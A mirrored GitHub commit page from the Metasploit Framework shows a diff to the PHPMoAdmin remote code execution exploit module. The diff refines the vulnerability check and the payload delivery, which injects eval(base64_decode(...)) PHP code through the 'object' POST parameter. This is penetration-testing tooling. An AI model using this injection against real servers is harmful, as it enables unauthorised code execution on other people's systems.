mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-10-29 18:07:27 +01:00
Update phpmoadmin_exec.rb
Changes: "Check if vulnerable" code improvement; Payload delivery code improvement; Minor indent issues. Thanks for your feedback guys :)
This commit is contained in:
parent
9530e15c81
commit
95962aab0d
@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Platform' => 'php',
|
||||
'Arch' => ARCH_PHP,
|
||||
'Arch' => ARCH_PHP,
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'PHPMoAdmin', { } ],
|
||||
@ -44,16 +44,17 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
end
|
||||
|
||||
def check
|
||||
testrun = Rex::Text::rand_text_alpha(10)
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.to_s,'moadmin.php'),
|
||||
'uri' => normalize_uri(target_uri,'moadmin.php'),
|
||||
'method' => 'POST',
|
||||
'vars_post' =>
|
||||
{
|
||||
'object' => '1;phpinfo();exit',
|
||||
'object' => "1;echo '#{testrun}';exit",
|
||||
}
|
||||
})
|
||||
|
||||
if res and res.body.match(/Build Date/)
|
||||
if res and res.body.include?(testrun)
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
|
||||
@ -65,14 +66,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
print_status("Executing payload...")
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.to_s,'moadmin.php'),
|
||||
'uri' => normalize_uri(target_uri,'moadmin.php'),
|
||||
'method' => 'POST',
|
||||
'vars_post' =>
|
||||
{
|
||||
'object' => "1;eval(base64_decode($_SERVER[HTTP_CMD]));exit"
|
||||
},
|
||||
'headers' => {
|
||||
'Cmd' => Rex::Text.encode_base64(payload.encoded)
|
||||
'object' => "1;eval(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));exit"
|
||||
}
|
||||
})
|
||||
|
||||
|
Loading…
Reference in New Issue
Block a user